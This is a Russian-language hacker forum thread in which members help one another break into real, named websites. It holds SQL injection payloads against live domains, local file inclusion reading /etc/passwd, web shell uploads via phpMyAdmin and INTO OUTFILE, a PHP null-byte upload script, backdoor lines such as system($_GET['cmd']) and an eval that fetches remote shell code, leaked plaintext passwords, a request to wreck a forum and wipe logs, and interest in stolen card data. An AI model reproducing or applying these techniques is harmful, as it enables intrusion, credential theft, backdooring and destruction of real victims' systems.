[COLOR=White-[/COLOR] с админки его не видно, соответственно НЕ удаляется
http://rapidshare.com/files/92224104/com_articles.zip.html
тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))
все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla
так:
/components/com_articles/articles.php
он не заведется


установил как компонент,а что дальше?(не заходит никуда

DavletAG said:
Спасибо! Прога Havij тоже определила как blind. Сейчас идет подбор имя базы и пользователя, вот только вместо символов там вопросики. Например имя базы: ??????????????????
В чем проблема?


на* юзать прагу =\ че мозг не работает???

если сам не в силах крутить, на форуме много хороших людей готовые помочь тебе. скуль в студию!

РедкийГад кончайте срач, эт не школа чтоб всем всему учить, нужны хоть начальные знания =\

вернитесь в форум и задавайте вопросы тогда когда что то поймете!

подскажите пожалуйста, что в этом случае можно сделать?

http://dbx.rainbow.or.at/cgi-bin/dbx/showthreaded.pl?Cat=1,3,4,5+group+by+1/*&Board=woman&Number=29085&page=0&view=collapsed&sb=5&o=&fpart=

Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(sel ect+count(*),concat((select+table_name+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--

выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)>1 проходит нормально,

а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1)

UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется?

UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=))

UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере?

UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?

http://as-roma.ru/team.php?id=61+order+by+15--

алерты как раскрутитЬ?

DavletAG said:
Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(sel ect+count(*),concat((select+table_name+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--
выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)>1 проходит нормально,
а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1)
UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется?
UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=))
UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере?
UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?



Попробуй здесь (https://antichat.live/search.php/) посмотреть

Подскажите пожалуйста, как раскрутить LFI на сервере с FreeBSD? Цель - залить шелл. На никсах знаю, через environ, но на фрях это не катит (или я не там смотрел?)...есть ли какой-нибудь хороший и главное понятный ман по раскрутке LFI на различных ОСях?

Заранее спасибо...

Lilo said:
http://as-roma.ru/team.php?id=61+order+by+15--
алерты как раскрутитЬ?


http://as-roma.ru/team.php?id=61+union+select+1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--

Вот поля. Видимо слепая она.

Нашел инструкцию залива шелла через phpmyadmin. Все сделал как надо. Все прошло без ошибок. Файл создался (т.к. при повторном запросе пишет что данный файл уже существует) но когда я ввожу в адресной строке site.com/shell.php то у меня открывается SiteMap. Причем этот же сайт мап открывается если ввести не существующий файл например site.com/dasdasd.php

В чем проблема?

UPDATE: ОХРЕНЕТЬ!!! Пароль от SQL подошел к FTP!!! Ща наведу там порядок

z0mbyak, почитай тут (https://rdot.org/forum/showthread.php?t=343)

DavletAG said:
Нашел инструкцию залива шелла через phpmyadmin. Все сделал как надо. Все прошло без ошибок. Файл создался (т.к. при повторном запросе пишет что данный файл уже существует) но когда я ввожу в адресной строке site.com/shell.php то у меня открывается SiteMap. Причем этот же сайт мап открывается если ввести не существующий файл например site.com/dasdasd.php
В чем проблема?
UPDATE: ОХРЕНЕТЬ!!! Пароль от SQL подошел к FTP!!! Ща наведу там порядок


UPDATE2: FTP шняга. Получил доступ к Parallels (PLESK) по порту 8443 вот это п****ц

Charle said:
Вывод имён колонок (MySQL >= 4.1 колонки NOT NULL)
Jokester как-то писал на одном форуме:


а можно ссылку на статью, гугл не находит

durito said:
а можно ссылку на статью, гугл не находит


Можно: https://rdot.org/forum/showthread.php?t=60

Только метод этот не мой, попрошу мне чужие заслуги не приписывать

http://www.romanchuk.com.ua/login.php

расшифровал, но зайти не могу почему-то((

Приветствую, маны почитал, вроде даже понял, но раскрутить не могу...

http://mzrd.ru/?f=%2fetc%2fpasswd%00

Пожалуйста, ткните носом...

Пароли сохраняются в /etc/shadow

Но прочитать не получиться прав не хватает.

Привет. Есть инъекция: http://www.swazicandlesusa.com/support/links.php?catID=22+and+1=0+union+select+1111,2222--

Пароли в plaintext-е:

Dapo5716?:eM58478

jim@macpor:h9$@JL3

Админка в /admin/. Как залить шелл?

z0mbyak said:
Приветствую, маны почитал, вроде даже понял, но раскрутить не могу...
http://mzrd.ru/?f=%2fetc%2fpasswd%00
Пожалуйста, ткните носом...


Чувак, все как на ладони! У тебя есть сайт с шелом? после знака = ставь ссылку на шелл

Iggy said:
Чувак, все как на ладони! У тебя есть сайт с шелом? после знака = ставь ссылку на шелл


ЧУВАК а не думаешь что нужно много слyшать и мало говорить?

там читалка,шелл залить не получится, только читать конфиги если что..

roddik said:
Привет. Есть инъекция: http://www.swazicandlesusa.com/support/links.php?catID=22+and+1=0+union+select+1111,2222--
Пароли в plaintext-е:
Dapo5716?:eM58478
jim@macpor:h9$@JL3
Админка в /admin/. Как залить шелл?


Лей в


http://www.swazicandlesusa.com/admin/patterns/index.php


Зацени, в "Birds and Fish", чет у меня не очень получилось...


http://www.swazicandlesusa.com/admin/patterns/pattern.php?PATID=A4AT




ЧУВАК а не думаешь что нужно много слyшать и мало говорить?


К тебе это тоже не относится!

Iggy said:
Лей в


Что лить? Там вроде как картинки заливаются

wso2.php%00.jpg или как-нить так...

А еще лучше попробуй с этими же паролями к фтп законнектиться(если он там есть)

Iggy said:
wso2.php%00.jpg или как-нить так...
А еще лучше попробуй с этими же паролями к фтп законнектиться(если он там есть)


к фтп не коннектится, код в картинке залить не получается

Чувак, все как на ладони! У тебя есть сайт с шелом? после знака = ставь ссылку на шелл


Шелл, в том то и дело, что не льется, а только на открытие... там функция fopen, есть ли еще примеры? Например, видел как-то как льют через вебализер, но его там тоже нет... или аналог environ%00 или логов апача, не могу добраться не до чего стоящего, кроме etc/passwd....

Заранее спасибо.

z0mbyak, шелл залил...отправил в ПМ.


там читалка,шелл залить не получится, только читать конфиги если что..


Konqi, там же не только читалка

Что делать если SQL-инъеция находится в БД products, а нужные данных в БД store. Можно ли из базы 1 каким нибудь запросом получить данные из базы 2.

И что делать если известны логин и пароль всей бд, но phpmyadmin найти не получается

DavletAG said:
Что делать если SQL-инъеция находится в БД products, а нужные данных в БД store. Можно ли из базы 1 каким нибудь запросом получить данные из базы 2.
И что делать если известны логин и пароль всей бд, но phpmyadmin найти не получается



Обращиние просто идёт так store.TABLE_NAME где TABLE_NAME имя таблицы.

как вытащить имена полей с таблици еси например вот такой запрос сканывает:


Code:
http://www.lol.com/item.php?pid=-212+union+select+1,2,3,group_concat(table_name),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+--+

пишу такое


Code:
http://www.lol.com/item.php?pid=-212+union+select+1,2,3,group_concat(COLUMN_NAME),5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+INFORM ATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='назва� �ие таблици'+limit+0+5+--+

выдает ошибку типа

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'название таблици\' limit 0 5 -- ORDER BY title ASC' at line 1

ну кроме тех пробелов в коде что добавляются шас )

че я тут неправельно пишу?

NorB said:
че я тут неправельно пишу?


Кавычки экранируются - переведи в HEX или CHAR. Перевести в HEX можно, выполнив на любом инсталле мускула SELECT CONCAT('0x', HEX('users')), вместо users пиши нужное название таблицы. Получишь строку вида 0x7573657273, ее пиши в WHERE. Еще ты неправильно пишешь слова "неправильно", "таблицы", "что" и "если".

пасиба буду исправляться

Извиняюсь за ламерский вопрос, но давно меня интересует: если сайт на чистом html, можно его взломать или нереально? Без всяких гостевых, полей для ввода каких-то данных -только хтмл страницы отдельные.

Flisk said:
Извиняюсь за ламерский вопрос, но давно меня интересует: если сайт на чистом html, можно его взломать или нереально? Без всяких гостевых, полей для ввода каких-то данных -только хтмл страницы отдельные.


Нельзя...

-PRIVAT-, в этой теме ты пока что только читай.

Объясните 1 вещь: я нашел инъекцию делаю запрос на вывод всех имен таблиц из INFORMATION_SCHEMA.tables но там не оказывается одной таблицы которая вываливается в ошибке когда проверяю инъекцию. Могу просматривать таблицу и тп.

Вопрос в том почему ее названия нету в INFORMATION_SCHEMA.tables ?

и походу вообще пользовательские таблицы не выводятся..

NorB said:
Объясните 1 вещь: я нашел инъекцию делаю запрос на вывод всех имен таблиц из INFORMATION_SCHEMA.tables но там не оказывается одной таблицы которая вываливается в ошибке когда проверяю инъекцию. Могу просматривать таблицу и тп.
Вопрос в том почему ее названия нету в INFORMATION_SCHEMA.tables ?
и походу вообще пользовательские таблицы не выводятся..



Та таблица (которая при ошибке вываливается) находится в другой БД. Запрос к ней будет выглядеть так: [database name].[table name]. Проверка в какой БД находится в поле shema_name.

Привет, нашел скулю (4 версия), достал акк админа, зашел в админку, пробую грузить файлы - похоже, что все сохраняется в базе - картинки и файлы выводятся в формате files.php?id=123. Еще обнаружился фуллпас от сайта, но кавычки в скуле экранируются и походу не получится в аутфайл что-то отправить. Можно ли как-то залить шелл? С радостью скину в ПМ разбирающимся людям инфу, если надо (сразу не пишу, так как иначе дети сайт загадят)

magic_quotes_gpc=On ili Off ?

k2b1~ said:
magic_quotes_gpc=On ili Off ?


хз, как проверить?

k2b1~ said:
magic_quotes_gpc=On ili Off ?




roddik said:
но кавычки в скуле экранируются


учимся читать

Konqi,Хм... А может я имел ввиду приехать и сломать сервер физически? Или, Reverse IP, а? Через сбрученный ФТП, и т.п. Вариантов достаточно.

-PRIVAT- said:
Konqi
,Хм... А может я имел ввиду приехать и сломать сервер физически? Или, Reverse IP, а? Через сбрученный ФТП, и т.п. Вариантов достаточно.


он имел в виду именно хтмл сайт,а не взлом через риверс ип или фтп, если ты столько понимаеш то другие тоже не дебили.

здесь рассматривалось взлом HTML сайта.

привет, помогите найти вход в админку на http://www.ettu.org и http://www.german-info.com/ Спасибо!

roddik said:
привет, помогите найти вход в админку на http://www.ettu.org и http://www.german-info.com/ Спасибо!


http://www.german-info.com/cms/

Konqi said:
учимся читать


on xz znaet magicu a otkuda znaet ekraniruetsya

budden said:
Подскажите, как передать ПОСТом нуль-байт, если форма аплоадит файл и значит enctype="multipart/form-data"?
Вот пример:

Code:

File:


Если передаю файл, и в тампер-дата дописываю к его имени %00 или \0 - они не интерпретируются как нуль-байт, а идут текстом. И файл получается с %00 или \0 в названии... Как быть?



Пробовал на CentOS, php5 - не работает, нуллбайт игнорируется и расширение .gif приписывается при MagicQuotes on и off

На винде работает при MagicQuotes Off


PHP:
';

$conte="--ololo\r\n";

$conte.='Content-Disposition: form-data; name="myname"'."\r\n\r\n";

$conte.='shell.php'."\x00"."\r\n";

$conte.="--ololo\r\n";

$conte.='Content-Disposition: form-data; name="picture"; filename="picture.jpg"'."\r\n";

$conte.="Content-Type: image/jpeg\r\n\r\n";

$conte.=$sh."\r\n";

$conte.="--ololo--\r\n";

post('http://host/script.php',$conte);

functionpost($url,$cont){

$url=parse_url($url);

$respons="";

$postsock=fsockopen($url['host'],80,$errno,$errstr,60);

$head="POST{$url['path']}HTTP/1.1\r\n";

$head.="Host:{$url['host']}\r\n";

$head.="Connection: close\r\n";

$head.="Content-Length: ".strlen($cont)."\r\n";

$head.="Content-Type: multipart/form-data; boundary=ololo\r\n\r\n";

$head.=$cont."\r\n";

fwrite($postsock,$head);

while(!feof($postsock)){

$respons.=fgets($postsock,1024);

}

fclose($postsock);

return$respons;

}

?>

Nightmarе said:
Если в скрипте стоит проверка реферера (защита от CSRF) её реально как нибудь обойти? Чисто с целью использовать CSRF запрос.
Если да, то подскажите как.


одиг из вариантов с помощью XSS отправить запрос с данной страници

Вопрос есть доступ к базе ipb

Table: ibf_members_converge

Columns:

converge_email

converge_joined

converge_pass_hash

converge_pass_salt

как мне сопоставить хеши к иду или юзернейму?куда еще рыть?

в копирайтах вижу это

Powered By IP.Board © 2010 IPS, Inc.

спасибо за ответы

шелл для булки-4

Привет!

вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось.

Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]);

И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда(((

Подскажите, что делаю ни так?

Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче.

что посоветуете? заранее спасибо за помощь

Pavel1987 said:
Привет!
вроде бы читал много про уязвимости вбуллетина, зашел в админку и попробовал залить через модули шелл adminer (скачал с сайта). Но через поиск по справки выполнить запрос не получилось.
Потом добавил еще один модуль с одной строчкой system($_GET["cmd"]);
И через так www.xz.сom/forumpath/faq.php?cmd= попробовал выполнить запрос sql для тестового удаления юзера. Такая же байда(((
Подскажите, что делаю ни так?
Если кратко, то есть форум VBULLETIN-4 и админский доступ к нему. Нужно как то положить форум что бы он стал не восстановим.при этом желательно что бы следы взлома не были обнаружены типа ошибка бд и что то в этом роде, удалить логи как то надо короче.
что посоветуете? заранее спасибо за помощь



www.xz.сom/forumpath/faq.php?cmd=command line commands

EX:www.xz.сom/forumpath/faq.php?cmd=ls -la

k2b1~ said:
www.xz.сom/forumpath/faq.php?cmd=http://www.testtest.com/shell.txt
ili probiy wget esli wget default funksiya



что за бред? это не инклюд...

А комманд лайн - это что за команды? Через них форр повесить можно?)

Т.е sql никак не покатит? я проста хотел сделать drop таблицы со всеми настройками, ну а потом и с логами))

вытащил хеши от админки, рашифровали, а они не подходят. В чём может быть причина!

могу скинуть линк в пм!

manerus said:
вытащил хеши от админки, рашифровали, а они не подходят. В чём может быть причина!
могу скинуть линк в пм!


админок может быть сколько угодно, поищу другую админку. может таблица была ЮЗЕРОВ, а не АДМИНОВ?

попробуй эти пассы к FTP, SSH...

Tigger said:
админок может быть сколько угодно, поищу другую админку. может таблица была
ЮЗЕРОВ
, а не
АДМИНОВ
?
попробуй эти пассы к FTP, SSH...[/QUOTE
в начале нашёл где были и юэеры и админ потом нашёл где только админы
движок сайта joomla!

еще раз предупреждаю всех, без всяких ников.

не дайте глупые советы которые только заблуждают пользователей, и не суйтесь в тему если вы в этом не разбираетесь.

буду следить строго,и в следуюший раз если увижу такое то будете отвечать за такое "бредо-сообщение".

Привет. Есть сайт http://www.pacificsun.com/, в нем таблица user, там мыло и пасс в тексте, всего 5 записей, в том числе webmaster@... , так что походу таблица касается админов. Пробовал найти админку - ничего не нашлось, только стандартная форма логина для обычных юзеров, куда не подходят данные. Подскажите, пожалуйста, куда таки надо вводить пароли?

manerus said:
движок сайта joomla!


В джумле админка в /administrator/ Туда пробовал вводить?

да не подходит

Нашел команды юникса, комманд лайн этот, пишу короче:

www.xz.сom/forumpath/faq.php?cmd=rm css.php (чтобы удалить файл css.php)

И нифига. Выводится страница поиска по справке. В ВБ 4.0 это пофиксили чтоли?

Через систему модулей добавлен модуль такого содержания: system($_GET["cmd"]);

manerus said:
да не подходит


скажи пожалуйста имя таблици откуда ты вытянул пароли,и в каком виде они хранялись.

Pavel1987 said:
Нашел команды юникса, комманд лайн этот, пишу короче:
www.xz.сom/forumpath/faq.php?cmd=rm css.php (чтобы удалить файл css.php)
И нифига. Выводится страница поиска по справке. В ВБ 4.0 это пофиксили чтоли?
Через систему модулей добавлен модуль такого содержания: system($_GET["cmd"]);



а ты смотрел права есть на удаление? или думаешь что сразу рута получил?...почитайте перед тем как постить бред сивой кобылы..

П.С. Радует одно что скоро всем вам в школу и прекратится бред и всякая чушь на ачате, хотя бы частично.

Я читал, но не понел как получить права рута

Pavel1987 said:
Я читал, но не понел как получить права рута


сначала проверь работает вообще коммандная строка или нет, потом командой ls -al смотри свои права на файлы =\

Pavel1987, зачем совать system($_GET["cmd"]); ???

вставляй eval(file_get_contents($_GET['e']))

и потом обращайся www.xz.сom/forumpath/faq.php?cmd=http://адресс_до_шела

почитай ВНИМАТЕЛЬНО тут (https://antichat.live/showthread.php/t/191917/)

попугай said:
Нельзя...


ахтунг, можно. Через уязвимости ПО, нет, не Веб ПО, а просто ПО, ftp, ssh сплойты и т.п.

А блин точно) Спасибо большое)) Я думал шелл надо совать в админку в модули, а не заливать куда-то, во я дурак))))

Подскажите как залить шелл через админку DataLife Engine..

Есть доступ на прикрепление файлов к новостям.

Charle said:
ахтунг, можно. Через уязвимости ПО, нет, не Веб ПО, а просто ПО, ftp, ssh сплойты и т.п.


прочитай несколько постов назад, был такой умник уже.

daniel_1024 said:
Pavel1987, зачем совать system($_GET["cmd"]); ???
вставляй eval(file_get_contents($_GET['e']))
и потом обращайся www.xz.сom/forumpath/faq.php?cmd=http://адресс_до_шела
почитай ВНИМАТЕЛЬНО
тут (https://antichat.live/showthread.php/t/191917/)



а зачем давать детишкам шелл с графикой? если они не могут самым нормальным шелом воспользоватся, в графике они самое умное что сделают так задефейсят сайт ...был дан код который можно вставить в модули, но вариантов куча, если брать по твоему то зачем и eval(file_get_contents($_GET['e'])) когда можно код всего шелла в модули пропихнуть?...

П.С. Зачем доисторическому человеку давать бензопилу? Ведь он не знает что с топором то делать...

SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start = now() AND a.status = 'active' AND a.adpage = 'blablabla.php?type=2'+group+by+2+--+'AND a.fileid = b.fileID

[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+2+--+' AND a.fileid = b.fileID' at line 5]

Подскажите как запрос свой всунуть а то с одной ' он выплевывает это, а если 2 поставить то запрос выполняется. Что в таком случае делать нужно...

'+group+by+2+--+ это пишу я ) тут плюсы фильтруются или че?

Попробуй вместо + поставить %20

Konqi said:
скажи пожалуйста имя таблици откуда ты вытянул пароли,и в каком виде они хранялись.


имя таблицы от куда вытащил idevaff_admin, пароли хранились sha1

manerus said:
имя таблицы от куда вытащил idevaff_admin, пароли хранились sha1


в джумле по дефолту имя таблицы jos_users, а алгоритм шифрования md5 или md5($pass.$salt) (зависит от версии джумлы)

выводы делай сам.

Konqi said:
в джумле по дефолту имя таблицы jos_users, а алгоритм шифрования md5 или md5($pass.$salt) (зависит от версии джумлы)
выводы делай сам.


я понимаю но почему то админка на joomla, пароли были sha1. а таблиц который должны быть в joomle там почему то нет!

ps могу скинут линк в пм сам глянешь, и если не трудно растолкуй потом мне.

я новичёк на сайте так что сильно не пинайтею я не знаю куда написать свой вопрос

скажите как удалить локальный диск!?

пишите в личку

куда здесь дальше вписывать +order+by+1-- ?

http://phonekz.ru/?region=%5C%22&id=1

http://phonekz.ru/?region=\'&id=1

hack-win32 said:
куда здесь дальше вписывать +order+by+1-- ?
http://phonekz.ru/?region=%5C%22&id=1
http://phonekz.ru/?region=\'&id=1


Там нет SQL Инъекции

Попробуй подставь в конец ссылки ковычку '. Ошибки нет.

stepashka_ said:
Там нет SQL Инъекции
Попробуй подставь в конец ссылки ковычку
'
. Ошибки нет.


ну а это тогда что означает ?


Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 87

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 103

hack-win32 said:
ну а это тогда что означает ?

Code:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 87

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftproot/data/www/phonekz.ru/index.php on line 103



Какая то ошибка в 87 и 103 строке, точно не знаю что.

Но это точно не иньекция..

stepashka_ said:
Какая то ошибка в 87 и 103 строке, точно не знаю что.
Но это точно не иньекция..


здесь тоже нет ? http://phonekz.ru:80/?region=\"&id=1&city=2133

попугай said:
Попробуй вместо + поставить %20


все равно фильтрует=\ эт значит уязвимости нету?

hack-win32 said:
здесь тоже нет ? http://phonekz.ru:80/?region=\"&id=1&city=2133


Тут тоже нет.

NorB said:
все равно фильтрует=\ эт значит уязвимости нету?


Варианты обхода пробелов:

/**/,+, %0А, %09, %20, %0d ,%2B, /*tuns*/

Если ничто не помогло - крути без пробелов, если ничто сделать не сможешь - готов помочь в асе - 4000840.


stepashka_ said:
Какая то ошибка в 87 и 103 строке, точно не знаю что.
Но это точно не иньекция..


Эта ошибка означает, что бд вернула неккоректный результат, чаще всего это инъекции сыпятся с такими ошибками, но это ошибка php, а не mysql. Может быть вывод ошибок mysql просто напросто отключен, но если посыпалась такая ошибка с подставлением ' - то значит в скрипте плохая фильтрация --> может быть инъекция.

подскажите пожалуйста, тут инъекция или что-то на нее похожее?

http://nudistavenue.com/browse/all/18-20%27/all

NorB said:
все равно фильтрует=\ эт значит уязвимости нету?



C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?

попугай said:
C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?


Вылазит тоже самое только c %20

SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start = now() AND a.status = 'active' AND a.adpage = 'knowledge_center_overview.php?type=2'%20group%20b y%209999%20--%20' AND a.fileid = b.fileID [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' AND a.fileid = b.fileID' at line 5]

как видно из запроса мой запрос как параметр передается и комментарий в конце не сканывает поэтому невыполняется, а если кавычку перед запросам убрать то там идет перенаправленние на главную страницу сразу

хм при /**/ тоже перенаправляет на главную страницу.

Карочи вот сайт http://www.wi-fi.org/knowledge_center_overview.php?type=2'

расскажи че там как я просто учусь) за день штук 10 таких бывает)

О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.

NorB said:
О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.


Если версия mysql > 5, то можно узнать наверняка

select table_schema from informashion_schema.tables where table_name='your_table';

Если такой возможности нет, то удостовериться сделав запрос из этой таблицы, назвав предполагаемую базу:

select * from предполагаемая_база.your_table;

ошибки нет - значит предположение верно

blablabla.php?start=16600+group+by+2+--+

ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1

как бороться с этим ,40

почему то не комментируется...

mr.celt - спс

NorB said:
blablabla.php?start=16600+group+by+2+--+
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1
как бороться с этим
,40
почему то не комментируется...
mr.celt - спс


А это не в Limit ли скуля? можешь попробовать /*

но что то мне подсказывает, что это скуля в limit...

kfor said:
А это не в Limit ли скуля? можешь попробовать /*
но что то мне подсказывает, что это скуля в limit...


Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?

NorB said:
Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?


Что именно ты хочешь вывести?

Скинь сюда свою скулю, посмотрим что можно сделать.

(MSSQL) Что не так с запросом?


Code:
1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='pass')--

пытаюсь вытянуть имена колонок определенной таблицы, но выводятся колонки всех таблиц (ну т.е. какую бы таблицу не указал, выводятся одни и те же колонки).. вроде бы понятно объяснил

stepashka_ said:
Что именно ты хочешь вывести?
Скинь сюда свою скулю, посмотрим что можно сделать.


http://tradebanging.com/community.php?start=-166000

IMMORTAL_S said:
(MSSQL) Что не так с запросом?

Code:
1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='pass')--

пытаюсь вытянуть имена колонок определенной таблицы, но выводятся колонки всех таблиц (ну т.е. какую бы таблицу не указал, выводятся одни и те же колонки).. вроде бы понятно объяснил


/showthread.php?p=2229980

Konqi said:
/showthread.php?p=2229980


Konqi, сп! помогло следующий раз буду юзать поиск

NorB said:
Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?


В limit нельзя использовать подзапросы. Если нет order bу, то крутится через union select. Если он есть, то после него нельзя использовать union, следовательно в таком случае проведение инъекции невозможно, только если сразу лить шелл.

into outfile '/path/shell.php' lines terminated by ""

Уважаемые форумчане, помогите плз разшевелить одну Blind SQL inject.

Есть баг


site/?news&id=139/**/and/**/1=1


Но при


site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>100


Ворачевается на главную, есть вероятность что фильтрются скобки, как можно это обойти?

Через order+by определил 5 столбцов.

Подскажите какие есть нюансы при Blind SQL inject, или дайте ссылку.

Если все прокатит возможно хорошее вознагрождение!

попробуйте "in" вместо ">"

mysql> SELECT 2 IN (0,3,5,7);

-> 0

mysql> SELECT 2 IN (1,2,3,2,5,7)

-> 1

или уменьш значение, потому и выворачиваетцо потому что ложь

site/?news&id=139/**/and/**/ascii(lower(substring(user(),1,1)))>10

а воше статьи почитайте как их крутить.

зы я не ясновыдящий и другие.

Strilo4ka said:
а воше статьи почитайте как их крутить.


Не подскажешь статейку по Blind Sql inject

Кстати union select тоже не работает

/thread119047.html

LiRvD082 said:
Не подскажешь статейку по Blind Sql inject
Кстати union select тоже не работает


статтей на ачате куча:

site:forum.antichat.ru blind в гугле или поиском у нас

или другие ресурсы на такую тематику.

продолжение на rdot:

https://rdot.org/forum/showthread.php?t=245&page=2.

/thread35207-blind.html

/thread18552-blind.html

/thread19844.html

тоесть искать надо.

...

зы

в ваши вопросы по уязвимостям

->поиск в этой теме

->blind.

и будет куча таких вопросов и как они решались.

Возможен ли inject с такой ошибкой:


Code:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/.../index.php on line 19

В запрос подставлял '

Еще вопрос (не относящийся к предыдущему)... при подстановке ' в запрос... открывается белая страница с надписью "Tampering: 338"

Что это означает?

IMMORTAL_S said:
Возможен ли inject с такой ошибкой:

Code:
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/.../index.php on line 19

В запрос подставлял '


всё зависит от определённой ситуации. Попробуй +order+by+1+--+ или вместо +--+ /* И если без ошибок, то потом order by 10000000 и смотри что получается. А так по ошибки у тебя не соответсвие типов. Ожидается значение булевого типа.

Пробую вывести нужные мне значения из таблицы юзеров (есть поля user_id, user_name, email, password):

script.php?id=-166+union+select+1,2,3,4,5,6,7,8,9,0,count(1),conc at((SELECT+COUNT(1)+from+users),CHAR(58),floor(ran d(0)*2))+x+from+users+group+by+x

Этот запрос выводит 3:1, то есть таблица не пуста. Когда пробую вместо SELECT+COUNT(1)+from+users писать SELECT+password+from+users+LIMIT+1, запрос проходит, соответственно инфа не выводится. В чем может быть проблема?

LIMIT+1,1

necr0log said:
LIMIT+1,1


не помогло, если мне не изменяет память, LIMIT 1 - это то же, что LIMIT 0,1, так что с этим проблем быть не должно, к тому же я пробовал GRUOP_CONCAT - тоже безуспешно

kfor said:
всё зависит от определённой ситуации. Попробуй +order+by+1+--+ или вместо +--+ /* И если без ошибок, то потом order by 10000000 и смотри что получается. А так по ошибки у тебя не соответсвие типов. Ожидается значение булевого типа.


Сп за разъяснение! Ничего больше выдавить не получилось. Хорошо хоть есть вывод двух разных сообщений... буду крутить блинами

IMMORTAL_S, в ПМ скинь ссылку. Помогу!

Помогте, пожалуйста, найти вход в админку на http://www.albionrecords.org/

rooopster said:
Помогте, пожалуйста, найти вход в админку на http://www.albionrecords.org/


http://albionrecords.org/includes/version.xml

Копай в этом направлении...

И в этом http://albionrecords.org/includes/

kfor said:
http://albionrecords.org/includes/version.xml
Копай в этом направлении...
И в этом http://albionrecords.org/includes/


благодарю

http://www.albionrecords.org/stats/

а есть кто может проконсультировать по геморройным скулям, таким как вот такая к примеру:

http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0

1


durito said:
а есть кто может проконсультировать по геморройным скулям, таким как вот такая к примеру:
http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0


ну и где там скуля О_О

Strilo4ka said:
ну и где там скуля О_О




Code:
